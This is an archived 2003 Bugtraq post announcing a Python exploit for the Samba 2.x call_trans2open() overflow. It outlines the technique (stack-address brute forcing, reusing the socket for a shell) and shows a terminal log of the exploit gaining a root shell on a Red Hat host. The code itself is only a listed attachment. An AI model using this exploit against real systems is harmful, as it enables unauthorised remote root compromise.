lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 8 Apr 2003 04:01:00 -0700 (PDT)
From: noir sin <noir@...mpos.org>
To: <bugtraq@...urityfocus.com>
Subject: samba 2.x call_trans2open() exploit


0day is fragile! one day it's your precious, next day its worthless ...

anyways i put together this SAMBAExploit class in python which might be
interesting for folks since it's reusable in many other stuff ...

python cause; write once a heap, stack or fmt string exploit class and the
rest is just to "cp old_exp.py new_exp.py; vi new_exp.py"

exploit bruteforces all possible stack range and dups the already
connected socket for spawning the shell

greets to: Michael Teo for pysmb, lsd-pl for linux/findsck shellcode

- noir

noir@...eof44:/tmp/samba_exp2 > python samba_exp.py 172.17.1.132
[*]  brute forcing well known addr range ... [*]
trying; retaddr: 0xbffed404
trying; retaddr: 0xbffed504
trying; retaddr: 0xbffed604
trying; retaddr: 0xbffed704
Linux localhost 2.4.9-e.3 #1 Fri May 3 17:02:43 EDT 2002 i686 unknown
cat /etc/redhat-rel*
Red Hat Linux Advanced Server release 2.1AS (Pensacola)
id
uid=0(root) gid=0(root) groups=99(nobody)
exit
*** Connection closed by remote host ***


Download attachment "samba_exp2.tar.gz" of type "APPLICATION/X-GUNZIP" (15799 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ